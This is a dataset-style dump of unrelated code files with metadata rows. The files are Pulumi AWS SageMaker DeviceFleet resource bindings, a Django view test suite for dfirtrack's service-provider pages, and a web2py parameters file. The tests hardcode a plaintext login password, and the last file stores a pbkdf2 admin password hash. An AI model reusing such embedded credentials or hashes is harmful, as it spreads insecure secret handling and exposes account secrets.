def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@device_fleet_name.setter
def device_fleet_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_fleet_name", value)
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@enable_iot_role_alias.setter
def enable_iot_role_alias(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_iot_role_alias", value)
@property
@pulumi.getter(name="iotRoleAlias")
def iot_role_alias(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "iot_role_alias")
@iot_role_alias.setter
def iot_role_alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iot_role_alias", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> Optional[pulumi.Input['DeviceFleetOutputConfigArgs']]:
"""
Specifies details about the fleet's output configuration. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: Optional[pulumi.Input['DeviceFleetOutputConfigArgs']]):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
class DeviceFleet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Sagemaker Device Fleet resource.
## Example Usage
### Basic usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.DeviceFleet("example",
device_fleet_name="example",
role_arn=aws_iam_role["test"]["arn"],
output_config=aws.sagemaker.DeviceFleetOutputConfigArgs(
s3_output_location=f"s3://{aws_s3_bucket['example']['bucket']}/prefix/",
))
```
## Import
Sagemaker Device Fleets can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:sagemaker/deviceFleet:DeviceFleet example my-fleet
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']] output_config: Specifies details about the fleet's output configuration. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeviceFleetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Sagemaker Device Fleet resource.
## Example Usage
### Basic usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.DeviceFleet("example",
device_fleet_name="example",
role_arn=aws_iam_role["test"]["arn"],
output_config=aws.sagemaker.DeviceFleetOutputConfigArgs(
s3_output_location=f"s3://{aws_s3_bucket['example']['bucket']}/prefix/",
))
```
## Import
Sagemaker Device Fleets can be imported using the `name`, e.g.,
```sh
$ pulumi import aws:sagemaker/deviceFleet:DeviceFleet example my-fleet
```
:param str resource_name: The name of the resource.
:param DeviceFleetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeviceFleetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeviceFleetArgs.__new__(DeviceFleetArgs)
__props__.__dict__["description"] = description
if device_fleet_name is None and not opts.urn:
raise TypeError("Missing required property 'device_fleet_name'")
__props__.__dict__["device_fleet_name"] = device_fleet_name
__props__.__dict__["enable_iot_role_alias"] = enable_iot_role_alias
if output_config is None and not opts.urn:
raise TypeError("Missing required property 'output_config'")
__props__.__dict__["output_config"] = output_config
if role_arn is None and not opts.urn:
raise TypeError("Missing required property 'role_arn'")
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["arn"] = None
__props__.__dict__["iot_role_alias"] = None
__props__.__dict__["tags_all"] = None
super(DeviceFleet, __self__).__init__(
'aws:sagemaker/deviceFleet:DeviceFleet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
device_fleet_name: Optional[pulumi.Input[str]] = None,
enable_iot_role_alias: Optional[pulumi.Input[bool]] = None,
iot_role_alias: Optional[pulumi.Input[str]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'DeviceFleet':
"""
Get an existing DeviceFleet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
:param pulumi.Input[str] description: A description of the fleet.
:param pulumi.Input[str] device_fleet_name: The name of the Device Fleet (must be unique).
:param pulumi.Input[bool] enable_iot_role_alias: Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
:param pulumi.Input[pulumi.InputType['DeviceFleetOutputConfigArgs']] output_config: Specifies details about the fleet's output configuration. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeviceFleetState.__new__(_DeviceFleetState)
__props__.__dict__["arn"] = arn
__props__.__dict__["description"] = description
__props__.__dict__["device_fleet_name"] = device_fleet_name
__props__.__dict__["enable_iot_role_alias"] = enable_iot_role_alias
__props__.__dict__["iot_role_alias"] = iot_role_alias
__props__.__dict__["output_config"] = output_config
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
return DeviceFleet(resource_name, opts=opts, __props__=__props__)
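# Hedged lookup sketch using the static method above (the resource name and
# the fleet id are hypothetical; per the class docstring, fleets are imported
# by their name):
#
#   existing = DeviceFleet.get("imported-fleet", id="my-fleet")
#   pulumi.export("fleet_arn", existing.arn)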
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Device Fleet.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description of the fleet.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="deviceFleetName")
def device_fleet_name(self) -> pulumi.Output[str]:
"""
The name of the Device Fleet (must be unique).
"""
return pulumi.get(self, "device_fleet_name")
@property
@pulumi.getter(name="enableIotRoleAlias")
def enable_iot_role_alias(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to create an AWS IoT Role Alias during device fleet creation. The name of the role alias generated will match this pattern: "SageMakerEdge-{DeviceFleetName}".
"""
return pulumi.get(self, "enable_iot_role_alias")
@property
@pulumi.getter(name="iotRoleAlias")
def iot_role_alias(self) -> pulumi.Output[str]:
return pulumi.get(self, "iot_role_alias")
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Output['outputs.DeviceFleetOutputConfig']:
"""
Specifies details about the fleet's output configuration. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) that has access to AWS Internet of Things (IoT).
"""
return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
| 46.490196 | 257 | 0.660607 | 2,885 | 23,710 | 5.203466 | 0.071057 | 0.085731 | 0.065281 | 0.03717 | 0.869105 | 0.853451 | 0.834932 | 0.811884 | 0.794431 | 0.777112 | 0 | 0.000387 | 0.237284 | 23,710 | 509 | 258 | 46.581532 | 0.829739 | 0.351877 | 0 | 0.644599 | 1 | 0 | 0.115493 | 0.035276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160279 | false | 0.003484 | 0.02439 | 0.006969 | 0.28223 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f71b2b58505f1a73cc43c49801a8cae13c3f8a26 | 43 | py | Python | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | 1 | 2018-04-02T15:38:10.000Z | 2018-04-02T15:38:10.000Z | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | null | null | null | src/Application/PythonScriptModule/proto/state_2.py | antont/tundra | 5c9b0a3957071f08ab425dff701cdbb34f9e1868 | [
"Apache-2.0"
] | 1 | 2021-09-04T12:37:34.000Z | 2021-09-04T12:37:34.000Z | import state
def change():
state.x = 2 | 10.75 | 15 | 0.627907 | 7 | 43 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.255814 | 43 | 4 | 15 | 10.75 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e393a2cbcb35bcfb29216dbbcea5e479a3f5c9b2 | 18,127 | py | Python | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | dfirtrack_main/tests/serviceprovider/test_serviceprovider_views.py | cclauss/dfirtrack | 2a307c5fe82e927b3c229a20a02bc0c7a5d66d9a | [
"Apache-2.0"
] | null | null | null | import urllib.parse
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Serviceprovider
class ServiceproviderViewTestCase(TestCase):
""" serviceprovider view tests """
@classmethod
def setUpTestData(cls):
# create object
Serviceprovider.objects.create(serviceprovider_name='serviceprovider_1')
# create user
User.objects.create_user(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
def test_serviceprovider_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/', safe='')
# get response
response = self.client.get('/serviceprovider/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_list_logged_in(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_list_template(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/serviceprovider/serviceprovider_list.html')
def test_serviceprovider_list_get_user_context(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_list_redirect(self):
""" test list view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/', safe='/')
# get response
response = self.client.get('/serviceprovider', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_detail_not_logged_in(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', safe='')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_detail_logged_in(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_detail_template(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/serviceprovider/serviceprovider_detail.html')
def test_serviceprovider_detail_get_user_context(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_detail_redirect(self):
""" test detail view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/', safe='/')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/add/', safe='')
# get response
response = self.client.get('/serviceprovider/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_logged_in(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
def test_serviceprovider_add_get_user_context(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_add_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/add/', safe='/')
# get response
response = self.client.get('/serviceprovider/add', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_add_post_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {
'serviceprovider_name': 'serviceprovider_add_post_test',
}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# get object
serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_add_post_test').serviceprovider_id
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_id) + '/', safe='/')
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_post_invalid_reload(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_post_invalid_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/add/', data_dict)
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
def test_serviceprovider_add_popup_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/add_popup/', safe='')
# get response
response = self.client.get('/serviceprovider/add_popup/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_add_popup_logged_in(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_add_popup_template(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form_popup.html')
def test_serviceprovider_add_popup_get_user_context(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/add_popup/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_add_popup_redirect(self):
""" test add view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
        destination = urllib.parse.quote('/serviceprovider/add_popup/', safe='/')
        # get response
        response = self.client.get('/serviceprovider/add_popup', follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=301, target_status_code=200)

    def test_serviceprovider_add_popup_post_redirect(self):
        """ test add view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # create post data
        data_dict = {
            'serviceprovider_name': 'serviceprovider_add_popup_post_test',
        }
        # get response
        response = self.client.post('/serviceprovider/add_popup/', data_dict)
        # compare
        self.assertEqual(response.status_code, 200)

    def test_serviceprovider_add_popup_post_invalid_reload(self):
        """ test add view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # create post data
        data_dict = {}
        # get response
        response = self.client.post('/serviceprovider/add_popup/', data_dict)
        # compare
        self.assertEqual(response.status_code, 200)

    def test_serviceprovider_add_popup_post_invalid_template(self):
        """ test add view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # create post data
        data_dict = {}
        # get response
        response = self.client.post('/serviceprovider/add_popup/', data_dict)
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/generic_form_popup.html')

    def test_serviceprovider_edit_not_logged_in(self):
        """ test edit view """
        # get object
        serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
        # create url
        destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', safe='')
        # get response
        response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    def test_serviceprovider_edit_logged_in(self):
        """ test edit view """
        # get object
        serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # get response
        response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
        # compare
        self.assertEqual(response.status_code, 200)

    def test_serviceprovider_edit_template(self):
        """ test edit view """
        # get object
        serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # get response
        response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')

    def test_serviceprovider_edit_get_user_context(self):
        """ test edit view """
        # get object
        serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # get response
        response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
        # compare
        self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')

    def test_serviceprovider_edit_redirect(self):
        """ test edit view """
        # get object
        serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # create url
        destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', safe='/')
        # get response
        response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit', follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=301, target_status_code=200)

    def test_serviceprovider_edit_post_redirect(self):
        """ test edit view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # create object
        serviceprovider_1 = Serviceprovider.objects.create(serviceprovider_name='serviceprovider_edit_post_test_1')
        # create post data
        data_dict = {
            'serviceprovider_name': 'serviceprovider_edit_post_test_2',
        }
        # get response
        response = self.client.post('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', data_dict)
        # get object
        serviceprovider_2 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_edit_post_test_2')
        # create url
        destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_2.serviceprovider_id) + '/', safe='/')
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    def test_serviceprovider_edit_post_invalid_reload(self):
        """ test edit view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # get object
        serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1').serviceprovider_id
        # create post data
        data_dict = {}
        # get response
        response = self.client.post('/serviceprovider/' + str(serviceprovider_id) + '/edit/', data_dict)
        # compare
        self.assertEqual(response.status_code, 200)

    def test_serviceprovider_edit_post_invalid_template(self):
        """ test edit view """
        # login testuser
        self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
        # get object
        serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1').serviceprovider_id
        # create post data
        data_dict = {}
        # get response
        response = self.client.post('/serviceprovider/' + str(serviceprovider_id) + '/edit/', data_dict)
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
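
    # Illustrative aside (not part of the original suite): the tests above
    # assemble detail/edit URLs by hand. A small helper like this, assuming
    # the same '/serviceprovider/<id>/' URL scheme, would remove the
    # repetition.
    def _serviceprovider_url(self, serviceprovider, suffix=''):
        """ build a serviceprovider URL such as '/serviceprovider/1/edit/' """
        return '/serviceprovider/' + str(serviceprovider.serviceprovider_id) + '/' + suffix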
| 42.451991 | 143 | 0.680808 | 1,778 | 18,127 | 6.724409 | 0.042182 | 0.052693 | 0.062563 | 0.065406 | 0.964369 | 0.945801 | 0.927986 | 0.919957 | 0.902727 | 0.883573 | 0 | 0.014214 | 0.212115 | 18,127 | 426 | 144 | 42.551643 | 0.822924 | 0.121035 | 0 | 0.576923 | 0 | 0 | 0.212086 | 0.115794 | 0 | 0 | 0 | 0 | 0.186813 | 1 | 0.192308 | false | 0.164835 | 0.021978 | 0 | 0.21978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e39b946b395aec70cfe88d0c904cb3533ac0c1ca | 92 | py | Python | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$8cc1ba2e242c0d1c$a7fdef5f919a98319af1a6eb61509c241350c0b8"
